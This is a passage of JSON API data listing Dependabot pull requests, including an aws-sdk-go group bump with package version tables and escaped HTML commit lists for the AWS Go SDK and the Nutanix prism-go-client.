--\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d66a76f1aec01d16e09309e3301ba0cd602a8f17\"\u003e\u003ccode\u003ed66a76f\u003c/code\u003e\u003c/a\u003e converged: add DeleteCdRom and GenerateConsoleToken to VMs service\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/0104740467e050461f068ebe465fc057af09f283\"\u003e\u003ccode\u003e0104740\u003c/code\u003e\u003c/a\u003e Adding changes to support error handling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/c121d041c92a637edaaed197419192aa79a88141\"\u003e\u003ccode\u003ec121d04\u003c/code\u003e\u003c/a\u003e feat: Adding api call to add customAttributes to VM (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/334\"\u003e#334\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2a1c8de076a0786faa16f7ee2cd03f3d8e474e77\"\u003e\u003ccode\u003e2a1c8de\u003c/code\u003e\u003c/a\u003e chore: bump jetlify action to v0.14.0 (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2bbbcd3103a542465227608d314804befbbcd3c1\"\u003e\u003ccode\u003e2bbbcd3\u003c/code\u003e\u003c/a\u003e fix: V4 API fixes for Objects Lite upload and configurable timeouts  (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/8b4db79f4c6750828da9466c0d49e74986b447a7\"\u003e\u003ccode\u003e8b4db79\u003c/code\u003e\u003c/a\u003e feat: add Images, Templates, and OVAs services for V4 packer migration (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/75efe03848ff09e1a6a00b8e06247d546986d677\"\u003e\u003ccode\u003e75efe03\u003c/code\u003e\u003c/a\u003e fix: removed usused Karbon APIs and renames in-use APIs to Konnector (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d23758422537995b8c946153f5d2bf949b430a55\"\u003e\u003ccode\u003ed237584\u003c/code\u003e\u003c/a\u003e fix(bumup): updating ntnx-api-golang-clients to latest versions (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-cl...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10763","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10763","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10763/packages"},{"uuid":"4316262131","node_id":"PR_kwDOAOaWjc7U_Y2a","number":123377,"state":"closed","title":"deps(go): bump the aws-sdk-go group across 1 directory with 11 updates","user":"dependabot[bot]","labels":["area/backend","dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-23T22:52:23.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-23T13:25:22.000Z","updated_at":"2026-04-23T22:52:33.000Z","time_to_close":34021,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(go): bump","group_name":"aws-sdk-go","update_count":11,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.41.5","new_version":"1.41.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/credentials","old_version":"1.19.14","new_version":"1.19.15","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatch","old_version":"1.45.3","new_version":"1.56.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs","old_version":"1.51.0","new_version":"1.69.1","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.225.2","new_version":"1.299.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/oam","old_version":"1.18.3","new_version":"1.23.16","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi","old_version":"1.26.6","new_version":"1.31.11","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.89.2","new_version":"1.100.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/secretsmanager","old_version":"1.40.1","new_version":"1.41.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"}],"path":null,"ecosystem":"go"},"body":"Bumps the aws-sdk-go group with 10 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.41.5` | `1.41.6` |\n| [github.com/aws/aws-sdk-go-v2/credentials](https://github.com/aws/aws-sdk-go-v2) | `1.19.14` | `1.19.15` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatch](https://github.com/aws/aws-sdk-go-v2) | `1.45.3` | `1.56.2` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs](https://github.com/aws/aws-sdk-go-v2) | `1.51.0` | `1.69.1` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.225.2` | `1.299.0` |\n| [github.com/aws/aws-sdk-go-v2/service/oam](https://github.com/aws/aws-sdk-go-v2) | `1.18.3` | `1.23.16` |\n| [github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.31.11` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.89.2` | `1.100.0` |\n| [github.com/aws/aws-sdk-go-v2/service/secretsmanager](https://github.com/aws/aws-sdk-go-v2) | `1.40.1` | `1.41.6` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.41.5 to 1.41.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.41.5...v1.41.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.19.14 to 1.19.15\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/credentials/v1.19.14...credentials/v1.19.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatch` from 1.45.3 to 1.56.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5a964704cb2640ed57a74b9b37a53dcda7b6b7dd\"\u003e\u003ccode\u003e5a96470\u003c/code\u003e\u003c/a\u003e Release 2024-12-19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/653aa807b912e104f5e1e84e0510b4dffd76c751\"\u003e\u003ccode\u003e653aa80\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d02b239e896c5791e295c9a30a5281f56a8f7c39\"\u003e\u003ccode\u003ed02b239\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/698d709c21bc7922489aaba8c8207c9d7253c2fe\"\u003e\u003ccode\u003e698d709\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/885de40869f9bcee29ad11d60967aa0f1b571d46\"\u003e\u003ccode\u003e885de40\u003c/code\u003e\u003c/a\u003e Fix improper use of Printf-style functions (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2934\"\u003e#2934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/858298a55393392fb161c5bd0ae3b9c5251996bf\"\u003e\u003ccode\u003e858298a\u003c/code\u003e\u003c/a\u003e Release 2024-12-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f58264af808a255782999422056bccb06552dcbd\"\u003e\u003ccode\u003ef58264a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/df31082d87044a000a1524dbb654651f32713e10\"\u003e\u003ccode\u003edf31082\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/346690ed8f5b974ab26532aa93d5fa92a58d3571\"\u003e\u003ccode\u003e346690e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/45154546e09b48505c8798f7e5f3846ee1e0453a\"\u003e\u003ccode\u003e4515454\u003c/code\u003e\u003c/a\u003e Release 2024-12-17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/rds/v1.45.3...service/ssm/v1.56.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs` from 1.51.0 to 1.69.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/34ec0a43cbf69475be3bbbb6329c49687cc018df\"\u003e\u003ccode\u003e34ec0a4\u003c/code\u003e\u003c/a\u003e Release 2025-11-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/540441aa03ecb2b3b2b2f1eab1b71661b0ae2481\"\u003e\u003ccode\u003e540441a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9869a2b39a8edb77fc98e0fc70d9bb059c6534a5\"\u003e\u003ccode\u003e9869a2b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a6b38c167b9ce07461c4f0af81be087055267121\"\u003e\u003ccode\u003ea6b38c1\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3953a0d499bf4a96a11e3377af3e5291831eed6c\"\u003e\u003ccode\u003e3953a0d\u003c/code\u003e\u003c/a\u003e add explicit message deser to all s3 errors (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3237\"\u003e#3237\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e7eec69683d04dbab33314fb6de43f8a43684163\"\u003e\u003ccode\u003ee7eec69\u003c/code\u003e\u003c/a\u003e Fix panic during auth scheme resolution due to region validation (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3235\"\u003e#3235\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d68b3a05c22b3bde751da6bb70e6fe01fd02407f\"\u003e\u003ccode\u003ed68b3a0\u003c/code\u003e\u003c/a\u003e Release 2025-11-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/292a19869df57271d51b382018591d71f09f72d3\"\u003e\u003ccode\u003e292a198\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dfeabc64ff80e2ee65951eb84d616072c8cd4b60\"\u003e\u003ccode\u003edfeabc6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a7a1be5d2c14e9270e927654b63272fdfbee1aa6\"\u003e\u003ccode\u003ea7a1be5\u003c/code\u003e\u003c/a\u003e Release 2025-11-21\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.51.0...service/ecs/v1.69.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.225.2 to 1.299.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18fee87f2c0615b0e5c3f28f1b95af810a9e77b5\"\u003e\u003ccode\u003e18fee87\u003c/code\u003e\u003c/a\u003e Release 2026-04-22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0ce157cd6b5427066ddb682a4967a3047230de4b\"\u003e\u003ccode\u003e0ce157c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68cdb4a02d56b9d932fbfed22660cfa64e815ef6\"\u003e\u003ccode\u003e68cdb4a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f399972fb759f6ffd315963de511da785ef408e6\"\u003e\u003ccode\u003ef399972\u003c/code\u003e\u003c/a\u003e Bump Smithy from 1.67.0 to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3394\"\u003e#3394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3c19a9b3eb17f48f6b9fc1cad644859d062775ad\"\u003e\u003ccode\u003e3c19a9b\u003c/code\u003e\u003c/a\u003e Release 2026-04-21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1dfac3ec5a6c560e6fee389d0f1f364eb57ae616\"\u003e\u003ccode\u003e1dfac3e\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d842df6fcef5ecc94e2133cb1d96fac4926aadb4\"\u003e\u003ccode\u003ed842df6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ffeb52a25097274529920d8f91b4ca27f7b636a9\"\u003e\u003ccode\u003effeb52a\u003c/code\u003e\u003c/a\u003e bump to latest smithy-go codegen (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3393\"\u003e#3393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e839880e8d30897bd8a7684d83626d81f82c565a\"\u003e\u003ccode\u003ee839880\u003c/code\u003e\u003c/a\u003e Release 2026-04-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4c898c88577f4102793d3e15de05ad3b5b1e2ef5\"\u003e\u003ccode\u003e4c898c8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.225.2...service/ec2/v1.299.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/oam` from 1.18.3 to 1.23.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/54aed732316b5162e5c4382a1f2d3891175d0254\"\u003e\u003ccode\u003e54aed73\u003c/code\u003e\u003c/a\u003e Release 2025-02-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/082781faee876f9d612fa7c113b4304a29766b14\"\u003e\u003ccode\u003e082781f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3ed185b604684a86547e679154975f1914f97312\"\u003e\u003ccode\u003e3ed185b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/03da7378d668622cd880ec741d57e93cc370efa1\"\u003e\u003ccode\u003e03da737\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8a8ccb619ffbfe00e99a83e99729b948f20be29\"\u003e\u003ccode\u003ec8a8ccb\u003c/code\u003e\u003c/a\u003e Bump go version to 1.22 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3010\"\u003e#3010\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8b7c7bf6d9a1c63d0c5262724ae8a15a44e366a6\"\u003e\u003ccode\u003e8b7c7bf\u003c/code\u003e\u003c/a\u003e fix missing AccountIDEndpointMode binding (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3013\"\u003e#3013\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90f9d1081a37acaf792ccda5bfb07e2ee7590a9e\"\u003e\u003ccode\u003e90f9d10\u003c/code\u003e\u003c/a\u003e Release 2025-02-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/40dd351c61c016749a3f4105cca0c965e7c66d7b\"\u003e\u003ccode\u003e40dd351\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/06352dfafe9067da1956229d6925efed328d5ff6\"\u003e\u003ccode\u003e06352df\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833566b553122ebd5bfa1237ee7c905a8db0d687\"\u003e\u003ccode\u003e833566b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.18.3...service/dax/v1.23.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi` from 1.26.6 to 